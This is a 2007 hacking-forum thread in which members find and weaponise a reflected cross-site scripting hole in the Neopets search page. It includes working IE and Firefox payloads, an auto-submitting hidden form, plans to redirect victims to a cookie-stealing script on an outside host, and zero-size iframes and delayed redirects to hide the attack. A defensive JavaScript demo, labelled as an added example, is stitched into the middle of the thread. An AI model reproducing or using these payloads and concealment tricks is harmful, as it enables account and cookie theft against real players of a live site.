Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 1 of 2
Neopets?
Date: January 17, 2007 09:03PM

I heard it's really really hard to find a vulnerability in Neopets and it's very wanted, in case you guys don't know.

Try to look for one? It's appreciated, thanks.

Re: Neopets?
Posted by: rsnake
Date: January 17, 2007 09:50PM

What is neopets, why is it hard and why is it wanted? Clearly, it's new to me, at least.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Neopets?
Date: January 17, 2007 10:00PM

http://www.neopets.com

Online virtual pet site, it has over 1.5 million players and the currency has value.

Looks please ^_^

Re: Neopets?
Posted by: Kyran
Date: January 17, 2007 10:09PM

They seem to cut out all echoed tags. I found a few pages where I can break out, but I can't inject anything. This was just a quick look mind you. I'll take a look at it again in the morning.

- Kyran

Re: Neopets?
Posted by: rsnake
Date: January 17, 2007 10:46PM

This will spin your browser out of control and only works in Internet Explorer, but it does work: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.neopets.com/search.phtml?q=%22+style%3Dxx%3Aexpression%28alert%281%29%29%3E&client=pub-9208792519293771&forid=1&ie=ISO-8859-1&oe=ISO-8859-1&safe=active&domains=www.neopets.com&cof=GALT%3A%23FFFFFF%3BGL%3A1%3BDIV%3A%23000066%3BVLC%3AFFFFFF%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A000066%3BALC%3AFFFFFF%3BLC%3AFFFFFF%3BT%3A000000%3BGFNT%3A000066%3BGIMP%3A000077%3BFORID%3A1&hl=en&s=%22+style%3Dxx%3Aexpression%28alert%28String.fromCharCode(88,83,83)%29%29%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: Neopets?
Posted by: id
Date: January 17, 2007 11:18PM

I hope your plan is to deface it forever, I got nauseous looking at that.

-id

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 06:55AM

This works in Firefox:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.neopets.com/search.phtml?q=Z&client=pub-9208792519293771&forid=1&ie=ISO-8859-1&oe=ISO-8859-1&safe=active&domains=www.neopets.com&cof=GALT%3A%23FFFFFF%3BGL%3A1%3BDIV%3A%23000066%3BVLC%3AFFFFFF%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A000066%3BALC%3AFFFFFF%3BLC%3AFFFFFF%3BT%3A000000%3BGFNT%3A000066%3BGIMP%3A000077%3BFORID%3A1&hl=en&s=%22+style%3D-moz-binding:url(//ha.ckers.org/xssmoz.xml%23xss%29

Thanks to maluc who showed me how in the thread about defenselink.



Edited 1 time(s). Last edit at 01/18/2007 06:59AM by hasse.

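The defensive lesson behind the two payloads above, as an added example that is not part of the thread: Kyran noted the site "cuts out all echoed tags", yet both the IE (`style=expression`) and Firefox (`-moz-binding`) variants get through, because the search term is reflected inside a quoted attribute and a bare `"` ends the value. The page shape (`<input name="s" value="...">`), the `stripTags` filter and all function names are my assumptions; the block shows the tag-stripping filter passing both payloads and proper HTML-attribute encoding neutralising them.

```javascript
// Added example, not from the thread: why "cutting out echoed tags" does not stop
// these payloads. Assumed page shape: the search term is reflected into a quoted
// attribute, <input name="s" value="...">, so a bare " ends the value and the rest
// of the input becomes new attributes (style=expression(...) / -moz-binding).

// Constructed from the two payloads quoted above (IE and Firefox variants).
const IE_PAYLOAD = '" style=xx:expression(alert(1))>';
const FF_PAYLOAD = '" style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)';

// A naive filter of the kind the thread describes (assumed): removes <...> tags only.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, '');
}

// The actual fix: encode every character that is significant inside an attribute.
function encodeForHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Reflect the query into the attribute using the given sanitiser.
function renderSearchInput(query, sanitise) {
  return `<input name="s" value="${sanitise(query)}">`;
}

// Minimal attribute tokenizer approximating what a browser sees on that tag:
// the tag ends at the first ">", values may be quoted or unquoted.
function attributeNames(tag) {
  const inner = tag.slice('<input'.length, tag.indexOf('>'));
  const re = /([^\s=]+)(?:=(?:"[^"]*"|'[^']*'|\S+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1]);
  return names;
}

// True when the reflected value escaped the attribute and created a style attribute.
function styleInjected(query, sanitise) {
  return attributeNames(renderSearchInput(query, sanitise)).includes('style');
}

for (const [label, payload] of [['IE', IE_PAYLOAD], ['Firefox', FF_PAYLOAD]]) {
  console.log(label, 'stripTags injected:', styleInjected(payload, stripTags)); // true
  console.log(label, 'encoded injected:', styleInjected(payload, encodeForHtmlAttribute)); // false
}
```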
Re: Neopets?
Date: January 18, 2007 12:33PM

Now how would I go about linking that to my php cookie script and spreading the link around so I can embed it onto pages thus stealing other cookies?

Re: Neopets?
Posted by: eyeced
Date: January 18, 2007 12:55PM

<form method='post' name='xss' action='http://www.neopets.com/search.phtml?q=Z'>
client:<input input="text" value="pub-9208792519293771" name="client" style="width:0%" /><br />
forid:<input input="text" value="1" name="forid" style="width:0%" /><br />
ie:<input input="text" value="ISO-8859-1" name="ie" style="width:0%" /><br />
oe:<input input="text" value="ISO-8859-1" name="oe" style="width:0%" /><br />
safe:<input input="text" value="active" name="safe" style="width:0%" /><br />
domains:<input input="text" value="www.neopets.com" name="domains" style="width:0%" /><br />
cof:<input input="text" value="GALT:#FFFFFF;GL:1;DIV:#000066;VLC:FFFFFF;AH:center;BGC:FFFFFF;LBGC:000066;ALC:FFFFFF;LC:FFFFFF;T:000000;GFNT:000066;GIMP:000077;FORID:1" name="cof" style="width:0%" /><br />
hl:<input input="text" value="en" name="hl" style="width:0%" /><br />
s:<input input="text" value="&quot; style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)" name="s" style="width:0%" /><br />
<br />
</form>
<script>
document.xss.submit()
</script>

Where the binding:url() links to an XML file on your server which, instead of containing

<constructor>alert('XSS')</constructor>

would contain a window.location = to your cookie stealer script. I haven't been on Neopets, but the code above automatically submits the XSS; it's only a slight modification of the WhiteAcid post forwarder. Anyway, if you could get an <img src="thexsshtmlfile"></img> on the forums then this is sure to work.

Re: Neopets?
Date: January 18, 2007 01:22PM

Where do I put all the...

<form method='post' name='xss' action='http://www.neopets.com/search.phtml?q=Z'>
client:<input input="text" value="pub-9208792519293771" name="client" style="width:0%" /><br />
forid:<input input="text" value="1" name="forid" style="width:0%" /><br />
ie:<input input="text" value="ISO-8859-1" name="ie" style="width:0%" /><br />
oe:<input input="text" value="ISO-8859-1" name="oe" style="width:0%" /><br />
safe:<input input="text" value="active" name="safe" style="width:0%" /><br />
domains:<input input="text" value="www.neopets.com" name="domains" style="width:0%" /><br />
cof:<input input="text" value="GALT:#FFFFFF;GL:1;DIV:#000066;VLC:FFFFFF;AH:center;BGC:FFFFFF;LBGC:000066;ALC:FFFFFF;LC:FFFFFF;T:000000;GFNT:000066;GIMP:000077;FORID:1" name="cof" style="width:0%" /><br />
hl:<input input="text" value="en" name="hl" style="width:0%" /><br />
s:<input input="text" value="&quot; style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)" name="s" style="width:0%" /><br />
<br />
</form>

stuff?

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 01:24PM

eyeced Wrote:
-------------------------------------------------------


> it would contain a window.location = to your cookie stealer script. I havent been on neo pets
> but this code above automatically submits the xss, its only a slight modification from the
> white acid post forwarder, any way if you could get an <img src="thexsshtmlfile"></img>
> on the forums then this is sure to work.

No, I don't think that would work. If you put the page in an image tag it would just try to fetch that page; I don't think it will read it, execute the JavaScript on it and post the data.

So you'd have to make the user visit your special page, maybe hide it in an iframe or something like that.



Edited 1 time(s). Last edit at 01/18/2007 01:25PM by hasse.

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 01:26PM

robertanderson Wrote:
-------------------------------------------------------
> Where do I put all the...
> ...
> stuff?

Copy the code from the box in the whiteacid-page and put that in a page of your own.

Re: Neopets?
Date: January 18, 2007 01:52PM

...



Edited 1 time(s). Last edit at 02/12/2007 09:53PM by robertanderson.

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 02:33PM

robertanderson Wrote:
-------------------------------------------------------
> Why doesn't this work?
>
>

Well, first of all, http://padora.phpnet.us/funny.xml isn't laid out like http://ha.ckers.org/xssmoz.xml. And secondly, I believe the "#xss" part is necessary.

Re: Neopets?
Date: January 18, 2007 02:39PM

Ok I fixed it now and it's still not working...

My script on php page...



Edited 1 time(s). Last edit at 01/18/2007 03:03PM by robertanderson.

Re: Neopets?
Posted by: WhiteAcid
Date: January 18, 2007 02:59PM

The link that maluc posted (http://preview.tinyurl.com/3d27my <-- safe preview-style link) creates the following code:
<form method='post' action='http://www.neopets.com/search.phtml?q=Z'>
	client:<input input="text" value="pub-9208792519293771" name="client" style="width:80%" /><br />
	forid:<input input="text" value="1" name="forid" style="width:80%" /><br />
	ie:<input input="text" value="ISO-8859-1" name="ie" style="width:80%" /><br />
	oe:<input input="text" value="ISO-8859-1" name="oe" style="width:80%" /><br />
	safe:<input input="text" value="active" name="safe" style="width:80%" /><br />
	domains:<input input="text" value="www.neopets.com" name="domains" style="width:80%" /><br />
	cof:<input input="text" value="GALT:#FFFFFF;GL:1;DIV:#000066;VLC:FFFFFF;AH:center;BGC:FFFFFF;LBGC:000066;ALC:FFFFFF;LC:FFFFFF;T:000000;GFNT:000066;GIMP:000077;FORID:1" name="cof" style="width:80%" /><br />
	hl:<input input="text" value="en" name="hl" style="width:80%" /><br />
	s:<input input="text" value="&quot; style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)" name="s" style="width:80%" /><br />
	<input type='submit' value='submit' /><br />
</form>
<script>
document.forms[0].submit()
</script>
That code works fine.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 01/18/2007 03:00PM by WhiteAcid.

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 02:59PM

robertanderson Wrote:
-------------------------------------------------------
> Ok I fixed it now and it's still not working...

Your XML file still doesn't match the ha.ckers one. Compare the source code of the two files.

Re: Neopets?
Date: January 18, 2007 07:33PM

Thanks a lot guys, I got that working.

I was able to put the cg script into an iFrame. I was wondering if I could put the POST action in an iFrame so the user doesn't see it?

Because how it is it comes up as...

ERROR : Sorry, nothing with the name '" style=-moz-binding:url(//XXXXX.XXXXXX.us/daxml.xml#xss)' exists. Please try again!

People will see my site url then, which I don't want.



Edited 1 time(s). Last edit at 01/18/2007 07:45PM by robertanderson.

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 07:59PM

robertanderson Wrote:
-------------------------------------------------------
> Thanks a lot guys, I got that working.
>
> I was able to put the cg script into an iFrame, I
> was wondering if I could put the POST action in an
> iFrame so the user doesn't see it?
>
> Because how it is it comes up as...
>
> ERROR : Sorry, nothing with the name '"
> style=-moz-binding:url(//XXXXX.XXXXXX.us/daxml.xml
> #xss)' exists. Please try again!
>
> People will see my site url then, which I don't
> want.

Just put all the code you got from Whiteacid's page in an iframe.

Re: Neopets?
Date: January 18, 2007 08:24PM

<iframe>

code

</iframe>

Like that? lol

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 08:37PM

robertanderson Wrote:
-------------------------------------------------------
> >
> code
>
>
>
> Like that? lol


No, add it to another page in an iframe.

<iframe src="xss_post_page.html" style="width:0px;height:0px;border:0px"></iframe>

Re: Neopets?
Date: January 18, 2007 09:09PM

Ohhh how cool, thanks!

Quick question, one...do you have aim or msn?

two...

I'm trying to do

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

So it does the XSS script and then goes to Google... but it seems like it just goes to Google and forgets about the iframe. When I remove the Google redirection it works, though, so I'm confused :P

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 09:17PM

robertanderson Wrote:
-------------------------------------------------------
> Ohhh how cool, thanks!
>
> Quick question, one...do you have aim or msn?

No unfortunately I don't.

> two...
>
> I'm trying to do
>
>
>
> location.href="http://www.google.com"
>
>
> So it does the xss script and then goes to
> google...but it seems like it just goes to google
> and forgets about the iframe. When I remove the
> google redirection it works though so I'm confused
> :P

I think it redirects too quickly; the XSS page doesn't have enough time to load and send its data.



Edited 2 time(s). Last edit at 01/18/2007 09:18PM by hasse.

Re: Neopets?
Posted by: rsnake
Date: January 18, 2007 09:20PM

It doesn't have time to load the iframe. Make your script wait a few seconds (or however long it takes for the user to see it) before running the location.href and that should work.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Neopets?
Date: January 18, 2007 09:21PM

So what do I do?

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

I was thinking something involving setTimeout... can't figure out the quotation marks though, they seem different in JS.

Re: Neopets?
Posted by: rsnake
Date: January 18, 2007 09:23PM

This function should do the trick:

function pause(millisecond)
{
var now = new Date();
var exitTime = now.getTime() + millisecond;

while(true)
{
now = new Date();
if(now.getTime() > exitTime) return;
}
}

- RSnake
Gotta love it. http://ha.ckers.org

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 09:41PM

rsnake Wrote:
-------------------------------------------------------
> This function should do the trick:
>
> function pause(millisecond)
> {
> var now = new Date();
> var exitTime = now.getTime() + millisecond;
>
> while(true)
> {
> now = new Date();
> if(now.getTime() > exitTime) return;
> }
> }

Maybe an alternative would be to use "meta refresh". Or just leaving the site with some amusing image on it without a redirect. Depending on what's less suspicious.


I wonder how many people disable JavaScript. Maybe it's a good idea to use a Flash file to do it instead/also?



Edited 2 time(s). Last edit at 01/18/2007 09:43PM by hasse.

Re: Neopets?
Date: January 18, 2007 09:52PM

Thanks for trying, but this time when I enter the URL it waits 2 seconds then again goes straight to Google.

Here's my current code...

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
pause(2000)
location.href="http://www.google.com"

function pause(millisecond)
{
var now = new Date();
var exitTime = now.getTime() + millisecond;

while(true)
{
now = new Date();
if(now.getTime() > exitTime) return;
}
}

</script>

Re: Neopets?
Posted by: hasse
Date: January 18, 2007 10:36PM

robertanderson Wrote:
-------------------------------------------------------
> Thanks for trying but this time when i enter the
> url it waits 2 seconds then again goes straight to
> google.
>
> Here's my current code...
>

You could try the "meta refresh"-tag:
<meta http-equiv="Refresh" content="4;url=http://www.domain.com/link.html">

Re: Neopets?
Posted by: Spikeman
Date: January 19, 2007 01:52AM

robertanderson Wrote:
-------------------------------------------------------
> So what do I do?
>
>
>
> location.href="http://www.google.com"
>
>
> I was thinking something involving
> settimeout...can't figure out the quotation marks
> though they seem different in JS.


Put the location.href in the iframe's onload.

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px;display:none" onload="location.href='http://neopets.justgotowned.com'"></iframe>
